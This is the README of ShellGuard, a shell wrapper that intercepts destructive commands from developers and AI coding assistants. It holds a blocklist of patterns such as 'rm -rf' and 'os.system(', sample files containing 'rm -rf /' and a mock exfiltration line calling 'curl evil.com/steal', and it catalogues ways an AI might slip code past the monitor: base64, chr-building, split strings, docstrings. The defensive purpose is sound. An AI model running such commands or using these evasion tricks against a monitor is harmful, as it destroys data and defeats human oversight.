
🛡️ ShellGuard

Your shell’s bodyguard - Intelligent command interceptor and safety net for developers


ShellGuard is a lightweight, ultra-sensitive shell wrapper that protects your development environment from dangerous commands, provides automatic backups, and gives you instant rollback capabilities. Perfect for controlling AI assistants, preventing accidents, and maintaining project health.

🔥 Ultra-Sensitive Detection

ShellGuard is so sensitive that it catches dangerous patterns even in code comments, docstrings, string literals, and encoded or obfuscated command fragments.

Real example: ShellGuard blocked its own security analysis code for containing pattern examples! 🎯

Instant install:

curl -fsSL https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh -o shellguard.sh && chmod +x shellguard.sh && source shellguard.sh && echo "✅ ShellGuard activated!"

Permanent install:

curl -fsSL https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh -o shellguard.sh && chmod +x shellguard.sh && source shellguard.sh && echo "source $(pwd)/shellguard.sh" >> ~/.bashrc && echo "✅ Permanent install complete!"

🚀 Quick Start

# Install ShellGuard
curl -o shellguard.sh https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh
chmod +x shellguard.sh

# Activate for current session
source shellguard.sh

# Make permanent (optional)
echo "source $(pwd)/shellguard.sh" >> ~/.bashrc

That’s it! Your shell is now protected. 🎉

✨ Features

🛡️ Ultra-Sensitive Command Interception

🔍 Advanced Detection Examples

Catches patterns in code comments:

# This code uses os.system() for file operations
🚨 Dangerous Python code detected in: example.py
Content preview:
1:# This code uses os.system() for file operations
Use 'force_python example.py' to run anyway
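The static check illustrated above can be sketched as a small shell function. This is a minimal sketch in the spirit of ShellGuard's scanner, not the actual code from shellguard.sh; the function name and pattern list are illustrative.

```shell
# Illustrative sketch of a pre-execution content scan: flag a file if
# any blocked pattern appears anywhere in it, comments and strings
# included, and print the offending lines.
scan_python_file() {
    file="$1"
    for pat in 'rm -rf' 'os.system(' 'eval('; do
        if grep -Fn "$pat" "$file" >/dev/null 2>&1; then
            echo "🚨 Dangerous pattern '$pat' in: $file"
            grep -Fn "$pat" "$file" | head -n 3
            return 1
        fi
    done
    return 0
}
```

Because the scan uses fixed-string matching over raw file content, a pattern in a comment is indistinguishable from one in live code, which is exactly the behavior shown above.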

Detects obfuscated dangerous patterns:

dangerous_command = "r" + "m" + " -rf"
🚨 Dangerous pattern detected during execution

Finds patterns in string dictionaries:

help_text = {
    "rm": "rm -rf removes files recursively",
    "caution": "Never use os.system() in production"
}
🚨 Dangerous Python code detected in: help.py
Content preview:
2:    "rm": "rm -rf removes files recursively"
3:    "caution": "Never use os.system() in production"

📦 Automatic Backups

🔄 Instant Recovery

🎯 AI Assistant Control

🎭 Real-World Detection Examples

🤖 AI Trying to Be Sneaky

Scenario 1: Base64 Obfuscation

import base64
dangerous = base64.b64decode("cm0gLXJm").decode()  # "rm -rf"
🚨 BLOCKED: ShellGuard detected encoded dangerous pattern

Scenario 2: Character Building

cmd = chr(114) + chr(109) + " -rf"  # Building "rm -rf"
🚨 BLOCKED: Pattern construction detected during execution

Scenario 3: Split Strings

part1 = "os.sys"
part2 = "tem("
dangerous_func = part1 + part2
🚨 BLOCKED: Dangerous function assembly detected

Scenario 4: AI Documentation Tricks

"""
This function is safe and does NOT use os.system() calls
Actually safe, definitely not calling os.system("rm -rf /")
"""
def safe_function():
    pass
🚨 Dangerous Python code detected in: ai_trick.py
Content preview:
3:Actually safe, definitely not calling os.system("rm -rf /")
Use 'force_python ai_trick.py' to run anyway

🔍 Why Such Sensitivity?

Because AI assistants are getting smarter at hiding dangerous code:

  1. Code in comments - AI puts dangerous examples in “safe” comments
  2. Documentation strings - Hides malicious code in docstrings
  3. String building - Constructs dangerous commands dynamically
  4. Encoding tricks - Uses Base64, hex, or other encodings
  5. Help text patterns - Embeds patterns in user-facing text

ShellGuard catches ALL of these! 🎯
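One of the encoding-trick checks above could be approximated like this. This is a hypothetical sketch, not ShellGuard's implementation: it pulls out string literals that look like Base64, decodes them, and re-scans the decoded text.

```shell
# Illustrative "encoding tricks" check: find base64-looking string
# literals in a file, decode each one, and scan the decoded text for
# blocked patterns.
scan_decoded_literals() {
    file="$1"
    for token in $(grep -oE '"[A-Za-z0-9+/=]{8,}"' "$file" | tr -d '"'); do
        decoded=$(printf '%s' "$token" | base64 -d 2>/dev/null) || continue
        case "$decoded" in
            *"rm -rf"*|*"os.system("*)
                echo "🚨 Encoded dangerous pattern in: $file"
                return 1 ;;
        esac
    done
    return 0
}
```

Run against the Base64 scenario above, the literal "cm0gLXJm" decodes to "rm -rf" and the file is flagged.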

📋 Commands Reference

🔍 Status & Monitoring

status          # Show complete system status
health          # Run full project health check
check           # Quick health check (perfect for AI)

Example output:

📊 ShellGuard STATUS
==================================
Health Score: 95/100 ✅
Commands Blocked: 3
Last Backup: backup_20241205_143022
Session Started: 2024-12-05T14:25:33
==================================

💾 Backup & Recovery

backup          # Create manual backup
rollback        # Restore from last backup
emergency       # Emergency reset with confirmation

🔒 Safety Overrides

When ShellGuard blocks a command, use these safe alternatives:

safe_rm file.txt           # Delete with automatic backup
force_git reset --hard     # Git command with backup
force_python script.py     # Run Python despite warnings
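The safe_rm idea boils down to "snapshot first, then delete". A minimal sketch, assuming a SHELLGUARD_BACKUPS override that the real script may not offer; the function body is illustrative, not the exact logic in shellguard.sh:

```shell
# Illustrative safe_rm: copy the targets into a timestamped backup
# directory, then delete them with the real rm (via `command`, so any
# shell-function override of rm is bypassed).
safe_rm_demo() {
    backup_root="${SHELLGUARD_BACKUPS:-$HOME/.shellguard/backups}"
    dest="$backup_root/backup_$(date +%Y%m%d_%H%M%S)"
    mkdir -p "$dest"
    cp -r -- "$@" "$dest"/ || return 1
    command rm -rf -- "$@"
    echo "📦 Backed up to $dest before deleting"
}
```

The `command` builtin is the key trick: it reaches the real binary even when the command name is shadowed by a wrapper function, which is how a wrapper can both intercept and still perform the operation.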

⚙️ Configuration

block "pattern"             # Add custom dangerous pattern
llm_help                   # Show all available commands

🎪 Usage Examples

🤖 Working with AI Assistants

Perfect session flow:

USER: "Check the project status"
AI: status
# 📊 Health Score: 98/100 ✅

USER: "Create a calculator script"
AI: [creates calculator.py]

USER: "Test the script"
AI: python calculator.py
# ✅ Syntax OK, Security OK, Execution successful

USER: "Commit the changes"
AI: git add . && git commit -m "Add calculator"
# ✅ Changes committed successfully

When AI tries something dangerous:

AI: rm -rf temp/
# 🚨 BLOCKED: Dangerous pattern detected: rm -rf
# Use 'safe_rm' if you really need to delete files

AI: safe_rm temp/
# ⚠️ Using SAFE RM - creating backup first
# 📦 Creating backup: backup_20241205_144523
# ✅ Files deleted safely

When AI tries to be sneaky:

AI: [Creates file with hidden dangerous patterns in comments]
AI: python ai_generated.py
# 🚨 Dangerous Python code detected in: ai_generated.py
# Content preview:
# 15:# Example: os.system("rm -rf /tmp")
# Use 'force_python ai_generated.py' to run anyway

USER: "Remove the dangerous examples from comments"
AI: [Creates clean version]
AI: python ai_generated_clean.py
# ✅ Clean code executed successfully

🐍 Ultra-Sensitive Python Security

Example 1: Comments with dangerous patterns

# cleanup.py
def cleanup_files():
    """
    This function cleans up files.
    WARNING: Never use os.system('rm -rf /') in production!
    Example of what NOT to do: eval(user_input)
    """
    print("Cleaning up safely...")
python cleanup.py
# 🚨 Dangerous Python code detected in: cleanup.py
# Content preview:
# 4:    WARNING: Never use os.system('rm -rf /') in production!
# 5:    Example of what NOT to do: eval(user_input)
# Use 'force_python cleanup.py' to run anyway

Example 2: String dictionaries

# help_system.py
COMMAND_HELP = {
    "delete": "Use rm -rf for recursive deletion",
    "execute": "os.system() executes shell commands",
    "evaluate": "eval() runs dynamic code"
}
python help_system.py
# 🚨 Dangerous Python code detected in: help_system.py
# Content preview:
# 3:    "delete": "Use rm -rf for recursive deletion",
# 4:    "execute": "os.system() executes shell commands", 
# 5:    "evaluate": "eval() runs dynamic code"
# Use 'force_python help_system.py' to run anyway

Example 3: AI trying to hide malicious code

# ai_malware.py - AI-generated "innocent" file
"""
Utility functions for file management.
This code is completely safe and secure.
"""

def get_system_info():
    # Just getting system info, nothing dangerous
    # Definitely not using os.system("curl evil.com/steal")
    return "System info"

def cleanup_temp():
    # Safe cleanup function  
    # Not using dangerous rm -rf operations
    pass
python ai_malware.py
# 🚨 Dangerous Python code detected in: ai_malware.py
# Content preview:
# 8:    # Definitely not using os.system("curl evil.com/steal")
# 12:    # Not using dangerous rm -rf operations
# Use 'force_python ai_malware.py' to run anyway

📦 NPM Safety

Automatic backups before package installations:

npm install some-package
# 🔍 Installing new packages: some-package
# 📦 Creating backup before package installation...
# ✅ Git backup created
# [normal npm install proceeds]

🔄 Git Protection

git reset --hard HEAD~5
# 🚨 BLOCKED: Dangerous pattern detected: --hard
# Use 'force_git' if you really need this git command

force_git reset --hard HEAD~5
# ⚠️ Using FORCE GIT - creating backup first
# 📦 Creating backup: backup_20241205_144856
# [git command executes]

⚡ Advanced Features

📊 Health Monitoring

ShellGuard continuously monitors your project:

health
# 🔍 Checking project health...
# 🐍 Checking Python syntax...
# ✅ Syntax OK: calculator.py
# ✅ Syntax OK: utils.py
# 📦 Checking Node.js project...
# ✅ Valid package.json
# 🎉 Project health: GOOD (Score: 98/100)

🔍 Background Monitoring

ShellGuard runs a background monitor that keeps the session state and health score up to date while you work.

🚨 Ultra-Sensitive Pattern Detection

Default blocked patterns apply in ANY context: rm -rf, os.system(, eval(, and git reset --hard are caught in commands, comments, docstrings, and string literals alike.

Advanced detection also covers encoded payloads (Base64, hex), character-by-character construction, and split-string assembly, as shown in the evasion examples above.

Add your own patterns:

block "dangerous_function("
# ✅ Added pattern to blocklist: dangerous_function(
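A block-style helper is little more than an append to the blocklist file shown in the file-structure section below. A sketch, assuming a SHELLGUARD_DIR override for illustration; the real script may hard-code the path:

```shell
# Illustrative `block` helper: record a custom pattern in
# ~/.shellguard/blocked.txt so the scanner picks it up.
block_demo() {
    dir="${SHELLGUARD_DIR:-$HOME/.shellguard}"
    mkdir -p "$dir"
    printf '%s\n' "$1" >> "$dir/blocked.txt"
    echo "✅ Added pattern to blocklist: $1"
}
```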

🎯 Detection Confidence Levels

ShellGuard scores each detection with a confidence level before deciding whether to warn or block.

📁 File Structure

~/.shellguard/
├── state.json          # Current system state
├── blocked.txt         # Custom blocked patterns
└── backups/           # Automatic backups
    ├── backup_20241205_143022/
    ├── backup_20241205_144523/
    └── backup_20241205_144856/

🔧 Configuration

🎛️ Customization

Edit ~/.shellguard/blocked.txt to add custom patterns:

your_dangerous_command
risky_operation
delete_everything
sneaky_ai_pattern

⚙️ Sensitivity Tuning

Adjust detection sensitivity in your shell:

export SHELLGUARD_SENSITIVITY=high    # Ultra-sensitive (default)
export SHELLGUARD_SENSITIVITY=medium  # Moderate detection
export SHELLGUARD_SENSITIVITY=low     # Basic protection only
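Internally, a sensitivity setting like this typically just selects which pattern tier the scanner uses. A hypothetical sketch; the tier names match the exports above, but the pattern groupings are illustrative, not ShellGuard's actual tiers:

```shell
# Illustrative mapping from SHELLGUARD_SENSITIVITY to a pattern list.
# `low` checks only the most destructive pattern; `high` (the default)
# checks everything.
patterns_for_sensitivity() {
    case "${SHELLGUARD_SENSITIVITY:-high}" in
        low)    printf '%s\n' 'rm -rf' ;;
        medium) printf '%s\n' 'rm -rf' 'os.system(' ;;
        *)      printf '%s\n' 'rm -rf' 'os.system(' 'eval(' ;;
    esac
}
```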

📊 State Management

ShellGuard maintains state in ~/.shellguard/state.json:

{
  "health_score": 95,
  "last_backup": "backup_20241205_143022",
  "commands_blocked": 3,
  "files_changed": 2,
  "session_start": "2024-12-05T14:25:33",
  "warnings": [],
  "detection_stats": {
    "patterns_caught": 15,
    "ai_evasions_blocked": 7,
    "obfuscation_detected": 3
  }
}
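Because the state file is flat JSON, individual fields can be read without extra dependencies. A crude sed-based sketch that assumes the one-key-per-line layout shown above; with jq available, `jq -r .health_score` is the cleaner choice:

```shell
# Illustrative field extractor for state.json: pull the value of a key,
# with or without surrounding quotes. Assumes the flat layout above.
state_get() {
    sed -n "s/.*\"$1\": *\"\{0,1\}\([^\",}]*\)\"\{0,1\}.*/\1/p" "$2" | head -n 1
}
```

Usage: `state_get health_score ~/.shellguard/state.json` prints the current score.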

🤝 Use Cases

🤖 AI Development Assistant Control

👥 Team Development

🔬 Experimentation & Learning

🏢 Production Safety

🚨 Emergency Procedures

🔥 Something Went Wrong

# Quick assessment
status

# If health score is low
health

# Emergency rollback
emergency
# 🚨 EMERGENCY MODE
# This will rollback to last known good state
# Continue? (y/N): y

💾 Manual Recovery

# List available backups
ls ~/.shellguard/backups/

# Manual restore (if emergency fails)
cp -r ~/.shellguard/backups/backup_TIMESTAMP/* .
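The timestamped directory names sort lexically, so "restore the newest backup" is a one-liner wrapped in a function. A sketch for manual recovery, with illustrative arguments (backup root, destination) rather than ShellGuard's own interface:

```shell
# Illustrative manual-restore helper: pick the newest backup_* directory
# by name and copy its contents into the destination (default: cwd).
restore_latest() {
    root="${1:-$HOME/.shellguard/backups}"
    dest="${2:-.}"
    latest=$(ls -d "$root"/backup_* 2>/dev/null | sort | tail -n 1)
    if [ -z "$latest" ]; then
        echo "No backups found in $root"
        return 1
    fi
    cp -r "$latest"/. "$dest"
    echo "✅ Restored from $latest"
}
```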

🔍 Debugging Issues

# Check what's blocked
cat ~/.shellguard/blocked.txt

# Review recent commands
cat ~/.shellguard/state.json

# Temporarily reduce sensitivity
export SHELLGUARD_SENSITIVITY=low

# Disable temporarily (not recommended)
unset -f python npm git rm  # Remove overrides

🛠️ Installation Options

📥 Method 1: Direct Download

curl -o shellguard.sh https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh
chmod +x shellguard.sh
source shellguard.sh

📦 Method 2: Git Clone

git clone https://github.com/wronai/shellguard.git
cd shellguard
source shellguard.sh

🔧 Method 3: Permanent Installation

# Download to standard location
curl -o ~/.shellguard.sh https://raw.githubusercontent.com/wronai/shellguard/main/shellguard.sh
chmod +x ~/.shellguard.sh

# Add to shell profile
echo "source ~/.shellguard.sh" >> ~/.bashrc  # or ~/.zshrc
source ~/.bashrc

🎯 Best Practices

Do’s

Don’ts

🎪 Working with AI

🔬 Advanced Detection Technology

🧠 How Ultra-Sensitivity Works

ShellGuard uses multi-layer pattern detection:

  1. Static Analysis: Scans file content before execution
  2. Runtime Monitoring: Watches command construction
  3. Context Awareness: Understands code intent
  4. Obfuscation Detection: Decodes hidden patterns
  5. AI Behavior Modeling: Recognizes AI evasion attempts
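To make layer 4 concrete, one simple way an obfuscation check can catch split-string assembly is to normalize the source before scanning: strip quotes and concatenation operators so adjacent fragments collapse back into the pattern they build. A hypothetical single-line sketch; real multi-line, multi-variable tracking is considerably more involved:

```shell
# Illustrative normalization pass: delete quote characters (octal 042
# and 047) and " + " concatenations, then scan the flattened text.
# This collapses `"os.sys" + "tem("` back into `os.system(`.
normalized_scan() {
    if tr -d '\042\047' < "$1" | sed 's/ *+ *//g' | grep -Fq 'os.system('; then
        echo "🚨 Dangerous function assembly detected in: $1"
        return 1
    fi
    return 0
}
```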

🎯 Detection Statistics

ShellGuard has been tested against code generated by a variety of AI models.

🛡️ Defense Against AI Evasion

Modern AI assistants try to evade detection by hiding patterns in comments and docstrings, building commands from string fragments, and encoding payloads in Base64 or hex.

ShellGuard catches ALL of these techniques! 🎯

🐛 Troubleshooting

Common Issues

“Too many false positives”

# Reduce sensitivity temporarily
export SHELLGUARD_SENSITIVITY=medium
# Or for specific files
force_python my_educational_examples.py

“ShellGuard blocked my legitimate security research”

# Use force commands with understanding
force_python security_research.py
# Or add exclusion pattern
block "!security_research_pattern"

“AI keeps getting blocked on innocent code”

# This is normal! Guide AI to write cleaner code
# Example: Instead of comments with dangerous examples,
# use abstract references: "avoid dangerous system calls"

🔧 Advanced Troubleshooting

See exactly what triggered detection

# Enable verbose detection logging
export SHELLGUARD_VERBOSE=true
python suspect_file.py

Test specific patterns

# Test if a pattern would be caught
echo "test rm -rf pattern" | shellguard_test_pattern
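If you want to experiment with pattern testing outside ShellGuard, a stand-in with the same shape is easy to sketch. The function below is illustrative, not the shipped shellguard_test_pattern helper: it reads stdin and checks it against a blocklist file.

```shell
# Illustrative stdin pattern tester: report which blocklist entry (if
# any) would match the piped-in text.
test_pattern_demo() {
    blocklist="${1:-$HOME/.shellguard/blocked.txt}"
    input=$(cat)
    while IFS= read -r pat; do
        [ -n "$pat" ] || continue
        case "$input" in
            *"$pat"*) echo "🚨 Would block: $pat"; return 1 ;;
        esac
    done < "$blocklist"
    echo "✅ Not blocked"
}
```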

Reset detection statistics

# Clear detection counters
rm ~/.shellguard/detection_stats.json

📈 Roadmap

🎯 Planned Features

🔮 Future Ideas

🤝 Contributing

We welcome contributions! Here’s how to help:

  1. Fork the repository
  2. Create a feature branch (git checkout -b feature/amazing-feature)
  3. Make your changes
  4. Test thoroughly with ShellGuard enabled
  5. Commit your changes (git commit -m 'Add amazing feature')
  6. Push to the branch (git push origin feature/amazing-feature)
  7. Open a Pull Request

📝 Contribution Guidelines

🧪 Testing ShellGuard’s Sensitivity

Want to see how sensitive ShellGuard is? Try these test files:

Test 1: Comment patterns

# test_comments.py
"""
Educational file showing dangerous patterns.
Never use os.system() in production code!
Example of bad practice: rm -rf /tmp/*
"""
print("This file just has dangerous examples in comments")

Test 2: String dictionaries

# test_strings.py
EXAMPLES = {
    "bad": "Never do: rm -rf /",
    "worse": "Avoid: os.system(user_input)",
    "terrible": "Don't use: eval(untrusted_code)"
}

Test 3: Obfuscated patterns

# test_obfuscated.py
import base64
# This contains encoded dangerous pattern
encoded = "cm0gLXJm"  # "rm -rf" in base64

All of these will be caught by ShellGuard! 🎯

📄 License

This project is licensed under the Apache License 2.0 - see the LICENSE file for details.

🙏 Acknowledgments

📞 Support


⭐ If ShellGuard saved your project from AI-generated malware, please star the repository!

Made with ❤️ by developers, for developers who work with AI.

Your shell’s bodyguard - because AI assistants are getting smarter, and so should your defenses.

📜 License

Copyright (c) 2025 WRONAI - Tom Sapletta

Licensed under the Apache License, Version 2.0 (the “License”); you may not use this file except in compliance with the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an “AS IS” BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.